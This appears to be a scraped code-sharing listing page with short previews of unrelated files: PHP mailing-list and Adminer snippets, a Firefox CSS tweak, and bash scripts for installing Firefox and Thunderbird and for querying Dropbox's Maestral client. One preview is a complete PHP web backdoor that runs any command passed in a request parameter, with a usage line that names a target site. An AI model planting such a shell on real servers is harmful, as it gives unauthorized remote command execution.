This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
include('includes/header.php'); | |
include('includes/login/auth.php'); | |
include('includes/subscribers/main.php'); | |
include('includes/helpers/short.php'); | |
#ini_set('error_reporting', E_ALL & ~E_NOTICE); | |
#ini_set('display_errors', 1); | |
$subscribers = $lists = array(); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
#ini_set('error_reporting', E_ALL & ~E_NOTICE); | |
#ini_set('display_errors', 1); | |
if (isset($_POST['del'])) { | |
include('includes/functions.php'); | |
include('includes/login/auth.php'); | |
$emails_del_all = array(); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@namespace url("http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul"); | |
tab.tabbrowser-tab .tab-close-button { | |
display: none; | |
} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
function adminer_object() { | |
class YourClass extends Adminer { | |
protected $externals; | |
function __construct($externals) { | |
$this->externals = $externals; | |
} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php # Simple PHP Backdoor adapted from DK (One-Liner Version) | |
# Usage: https://target.com/unique-name-of-your-backdoor.php | |
<?php if (isset($_REQUEST['cmd'])) { echo '<style>html{height:100%}body{box-sizing:border-box;min-height:100%;margin:0;padding:1ex;background:#000;color:#eee}</style><pre><code>'; ob_start('htmlspecialchars'); system($_REQUEST['cmd']); echo ob_get_clean(), '</code></pre>'; exit; } | |
echo '<title>$</title><form action="', htmlspecialchars($_SERVER['REQUEST_URI']), '" method=post target=cmd_result><input name=cmd size=80> <input type=submit value=execute></form><hr><iframe name=cmd_result style="width:80em;height:30em">ready</iframe>'; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
set -e | |
# Installation of this script: | |
# Delete one of the url variables below, or get another from | |
# https://www.mozilla.org/firefox/all/#product-desktop-developer | |
# by selecting your language and platform, then copying the link on the | |
# Download button. | |
# | |
url='https://download.mozilla.org/?product=firefox-devedition-latest-ssl&os=linux64&lang=en-US' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
set -e | |
# Installation of this script: | |
# Delete one of the url variables below, or get another from | |
# https://www.thunderbird.net/thunderbird/all/ | |
# and substituting its version number with 'latest' | |
# | |
url='https://download.mozilla.org/?product=thunderbird-latest-SSL&os=linux64&lang=en-US' | |
url='https://download.mozilla.org/?product=thunderbird-latest-SSL&os=linux64&lang=en-GB' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
if maestral status | grep -qFi 'not running'; then | |
err='Maestral not running' | |
elif ! droot="`maestral config get path`"; then | |
err='Maestral not found' | |
elif ! real="`realpath -eLPq "$1"`"; then | |
err='Path does not exist' | |
elif [[ ${#real} -le ${#droot} || "${real:0:${#droot}}" != "$droot" ]]; then | |
err="The path $real is not below the Dropbox root directory $droot" | |
else |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
/** | |
* Import SQL files from a directory | |
* | |
* @author joshcangit, https://github.com/joshcangit | |
* @author Roy-Orbison, https://github.com/Roy-Orbison | |
*/ | |
class AdminerImportFromDir { |
OlderNewer